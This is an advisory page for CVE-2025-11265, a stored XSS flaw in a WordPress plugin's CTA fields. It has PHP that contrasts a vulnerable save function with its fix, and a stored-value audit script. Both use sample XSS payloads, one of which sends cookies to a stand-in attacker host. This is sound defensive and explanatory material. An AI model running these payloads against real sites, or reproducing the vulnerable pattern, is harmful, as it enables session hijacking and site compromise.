CVE-2025-11265: CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) in kurudrive VK All in One Expansion Unit
The VK All in One Expansion Unit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text' parameters in all versions up to, and including, 9.112.1. This is due to a logic error in the CTA save function that reads sanitization callbacks from the wrong variable ($custom_field_name instead of $custom_field_options), causing the sanitization to never be applied. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that execute when a user accesses an injected page.
AI Analysis
Technical Summary
CVE-2025-11265 is a stored cross-site scripting (XSS) vulnerability in the VK All in One Expansion Unit plugin for WordPress, affecting all versions up to and including 9.112.1. The root cause is a logic error in the plugin's CTA (Call To Action) save function: the code that should look up each field's sanitization callback reads it from $custom_field_name, the variable that, by its name, holds the field's key, instead of $custom_field_options, the array that carries the callback. The lookup therefore never yields a callback, and the values submitted for 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text' are stored exactly as received. Any authenticated user with the Contributor role or higher can save a payload such as a javascript: URL or an HTML tag carrying an event handler into a CTA, and the script runs in the browser of whoever loads a page on which that CTA is rendered. WordPress marks its authentication cookies HttpOnly, so the practical attack is not cookie theft but riding the victim's session: a script executing in an Editor's or Administrator's browser can fetch admin pages, harvest nonces and submit forms on the victim's behalf, which is how stored XSS in WordPress is commonly turned into a new administrator account or a malicious plugin install. No user interaction beyond loading the affected page is required. The CVSS 3.1 base score is 6.4 (Medium): network attack vector, low attack complexity, low privileges required, no user interaction, changed scope, and low confidentiality and integrity impact with no availability impact. At the time of this analysis no public exploit or vendor patch had been recorded, so administrators should treat the issue as open and apply the workarounds below. The weakness is classified as CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page). Given WordPress's install base and the plugin's role in site marketing content, the exposure is moderate in severity but broad in reach.
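The bug class the advisory describes, a per-field sanitizer table whose callback is looked up on the wrong variable, is easiest to understand beside its fix. The following PHP is an added illustration written for this page, not the plugin's own code: the two field names come from the advisory, the sanitizers are plain-PHP stand-ins for WordPress's esc_url_raw() and sanitize_text_field() so the file runs without WordPress, and the shape of the option table and save loop is an assumption about how such code is typically structured.

```php
<?php
// Added illustration (not the plugin's code) of the bug class in CVE-2025-11265:
// a sanitize-callback table whose callback is read from the wrong variable, so
// every value is stored raw. Field names are from the advisory; the sanitizers
// are plain-PHP stand-ins for esc_url_raw()/sanitize_text_field() (assumption).
declare(strict_types=1);

// Stand-in for esc_url_raw(): allow only absolute http/https URLs.
function sanitize_cta_url(string $value): string
{
    $value  = trim($value);
    $scheme = strtolower((string) parse_url($value, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        return '';   // javascript:, data:, vbscript: and friends are dropped
    }
    return filter_var($value, FILTER_VALIDATE_URL) === false ? '' : $value;
}

// Stand-in for sanitize_text_field(): no markup, collapsed whitespace.
function sanitize_cta_text(string $value): string
{
    $value = strip_tags($value);
    return trim(preg_replace('/\s+/', ' ', $value) ?? '');
}

// Option table: each field key maps to its options, including its sanitizer.
const CUSTOM_FIELD_OPTIONS = [
    'vkExUnit_cta_url'         => ['sanitize' => 'sanitize_cta_url'],
    'vkExUnit_cta_button_text' => ['sanitize' => 'sanitize_cta_text'],
];

// Vulnerable shape: the callback is looked up on $custom_field_name, which is
// the field's key (a string). isset() on a non-numeric string offset is always
// false and raises no error, so the branch never runs and raw input is saved.
function save_cta_vulnerable(array $input): array
{
    $saved = [];
    foreach (CUSTOM_FIELD_OPTIONS as $custom_field_name => $custom_field_options) {
        if (!isset($input[$custom_field_name])) {
            continue;
        }
        $value = (string) $input[$custom_field_name];
        if (isset($custom_field_name['sanitize'])) {                 // BUG: wrong variable
            $value = call_user_func($custom_field_name['sanitize'], $value);
        }
        $saved[$custom_field_name] = $value;                          // stored unsanitized
    }
    return $saved;
}

// Fixed shape: read the callback from the options array and fail closed,
// i.e. refuse to store a field that has no usable sanitizer.
function save_cta_fixed(array $input): array
{
    $saved = [];
    foreach (CUSTOM_FIELD_OPTIONS as $custom_field_name => $custom_field_options) {
        if (!isset($input[$custom_field_name])) {
            continue;
        }
        $callback = $custom_field_options['sanitize'] ?? null;
        if (!is_callable($callback)) {
            continue;                                                 // never store raw
        }
        $saved[$custom_field_name] = call_user_func($callback, (string) $input[$custom_field_name]);
    }
    return $saved;
}

// Constructed contributor-supplied input for the demonstration.
$submitted = [
    'vkExUnit_cta_url'         => 'javascript:alert(document.cookie)',
    'vkExUnit_cta_button_text' => 'Buy now<img src=x onerror=alert(1)>',
];

// Compare what each version would persist for the same submission.
print_r(save_cta_vulnerable($submitted));
print_r(save_cta_fixed($submitted));
```

Run it with the php CLI (PHP 7.1 or later). The detail worth remembering is why the bug stayed silent: isset() on a string with a non-numeric offset returns false in every PHP version without a warning, so nothing in the logs pointed at the dead branch. Output escaping at render time (esc_url(), esc_html(), esc_attr()) remains a separate layer and should be present regardless of what the save path does.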
Potential Impact
The primary impact of CVE-2025-11265 is loss of confidentiality and integrity on WordPress sites running the VK All in One Expansion Unit plugin. A Contributor can save a CTA containing a script payload; because Contributors cannot normally publish, the first victim is typically the Editor or Administrator who previews or reviews the submission, and once the content is live, every visitor to the page. A script executing in an administrator's browser can read data the session has access to, submit forms in the victim's name (user creation and plugin installation included), and deface content. Availability is not directly affected, but a defaced site or a follow-on account compromise carries real operational, reputational and financial cost. The authenticated-access requirement limits exposure but does not eliminate it: Contributor accounts are routinely issued to guest authors and agency staff, and one phished or reused Contributor password is enough. The changed scope in the CVSS vector reflects that the injected script affects users other than the attacker, which is what amplifies the damage. Until the plugin is updated the condition is persistent: the payload sits in the database and fires on every render, so multi-author, high-traffic sites are the most exposed.
Mitigation Recommendations
1. Restrict Contributor-level and higher roles to trusted, individually identified accounts; remove dormant accounts and enforce strong passwords and multi-factor authentication, since a stolen Contributor credential is all an attacker needs.
2. Audit the values already stored for 'vkExUnit_cta_url' and 'vkExUnit_cta_button_text' on existing CTA entries for markup, event-handler attributes or non-http(s) URL schemes, and identify who last edited any entry that fires.
3. Add Web Application Firewall (WAF) rules for these two parameters, with the caveat that the values are submitted by authenticated users through the WordPress admin: the rules must inspect authenticated POST bodies to the admin endpoints, not just anonymous traffic, and must decode entity and percent encoding before matching. Treat this as a stopgap, not a fix.
4. Deploy a Content Security Policy (CSP) to limit where scripts may load from and to block inline script execution. Note that the WordPress admin and most themes rely on inline scripts, so a strict script-src without nonces or hashes will break the site; scope the policy to the front end or roll it out with nonces, and treat CSP as impact reduction rather than remediation.
5. Keep regular backups and an incident response plan. Because the payload lives in the database, cleanup means removing the injected meta values, not only restoring affected pages; a backup taken after the injection will restore the payload along with the content.
6. Watch for a vendor release later than 9.112.1 that addresses this issue and apply it promptly; confirm the installed version in the plugins screen or with `wp plugin list`.
7. If patching is not possible, deactivate or replace the plugin. Deactivation stops the CTAs from rendering but leaves any stored payloads in the database, so still perform the audit in step 2.
8. Educate contributors about safe input practices. This reduces accidental injection only; it is not a control against a malicious or compromised contributor account.
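Step 2 above is the one most sites skip for lack of a concrete tool. The following PHP is an added example written for this page, not the plugin's or WordPress's own code. It assumes the two parameters are persisted as post meta under the same key names (an assumption about the plugin's storage), and that the script is run with WP-CLI as `wp eval-file cta-audit.php` (file name chosen here); without WordPress present it falls back to classifying a few constructed sample values so the matching logic can be exercised on its own.

```php
<?php
// Added example (not the plugin's or WordPress's code): audit stored values for
// the two vulnerable CTA keys. Assumes the values are post meta under the same
// names and that this runs via `wp eval-file cta-audit.php` (WP-CLI). Needs PHP 8.
declare(strict_types=1);

const CTA_META_KEYS = ['vkExUnit_cta_url', 'vkExUnit_cta_button_text'];

// Normalise before matching: decode HTML entities and percent-encoding, strip
// control characters and whitespace (defeats "java\tscript:"), lower-case.
function normalize_for_scan(string $value): string
{
    $v = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $v = rawurldecode($v);
    $v = preg_replace('/[\x00-\x20]+/', '', $v) ?? $v;
    return strtolower($v);
}

// Return the list of indicators that fire for one key/value pair (empty = clean).
function cta_value_indicators(string $key, string $value): array
{
    $n    = normalize_for_scan($value);
    $hits = [];

    if ($key === 'vkExUnit_cta_url') {
        // A URL field should only ever hold http/https (or a relative path).
        $scheme = strtolower((string) parse_url(trim($value), PHP_URL_SCHEME));
        if ($scheme !== '' && !in_array($scheme, ['http', 'https'], true)) {
            $hits[] = "non-http scheme: $scheme";
        }
        if (preg_match('/^(javascript|data|vbscript):/', $n)) {
            $hits[] = 'script-bearing URL scheme';
        }
    }

    // Neither field should contain markup at all, so any tag is an anomaly.
    if ($n !== strip_tags($n)) {
        $hits[] = 'html markup present';
    }
    foreach (['<script', '<svg', '<iframe', 'onerror=', 'onload=', 'onmouseover=', 'srcdoc='] as $needle) {
        if (str_contains($n, $needle)) {
            $hits[] = "token: $needle";
        }
    }
    return $hits;
}

// Pull every stored value for the two keys out of wp_postmeta and classify it.
function audit_cta_meta(): array
{
    global $wpdb;
    $placeholders = implode(',', array_fill(0, count(CTA_META_KEYS), '%s'));
    $rows = $wpdb->get_results(
        $wpdb->prepare(
            "SELECT post_id, meta_key, meta_value FROM {$wpdb->postmeta} WHERE meta_key IN ($placeholders)",
            ...CTA_META_KEYS
        ),
        ARRAY_A
    );
    $findings = [];
    foreach ($rows as $row) {
        $hits = cta_value_indicators($row['meta_key'], (string) $row['meta_value']);
        if ($hits) {
            $findings[] = ['post_id' => (int) $row['post_id'], 'key' => $row['meta_key'], 'indicators' => $hits];
        }
    }
    return $findings;
}

if (defined('ABSPATH')) {
    // Inside WordPress (WP-CLI): report every entry that needs a human look.
    foreach (audit_cta_meta() as $f) {
        printf("post %d %s: %s\n", $f['post_id'], $f['key'], implode('; ', $f['indicators']));
    }
} else {
    // Offline: classify constructed sample values to exercise the matcher.
    $samples = [
        ['vkExUnit_cta_url',         'https://example.com/signup'],
        ['vkExUnit_cta_url',         'java&#x09;script:alert(1)'],
        ['vkExUnit_cta_button_text', 'Sign up'],
        ['vkExUnit_cta_button_text', '<svg/onload=fetch("//evil.example/"+document.cookie)>'],
    ];
    foreach ($samples as [$k, $v]) {
        printf("%-26s %-55s %s\n", $k, $v, implode('; ', cta_value_indicators($k, $v)) ?: 'clean');
    }
}
```

The matcher is deliberately strict: these two fields have no legitimate reason to hold any tag or any scheme other than http(s), so "markup present" is itself a finding rather than a false-positive risk. Decoding entities and stripping control characters before matching matters because a contributor who can write raw values can also choose their encoding; matching on the stored bytes alone would miss `java&#x09;script:`. Treat each hit as something to review by hand, together with the last editor of that entry.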
Affected Countries
United States, India, Brazil, Germany, United Kingdom, Canada, Australia, France, Japan, Netherlands, Italy, Spain
Technical Details
- Data Version: 5.2
- Assigner Short Name: Wordfence
- Date Reserved: 2025-10-03T15:18:31.287Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 691c2e7635a0ab0a5625e9c2
Added to database: 11/18/2025, 8:29:42 AM
Last enriched: 2/27/2026, 6:55:19 PM
Last updated: 3/25/2026, 1:42:49 AM
Views: 139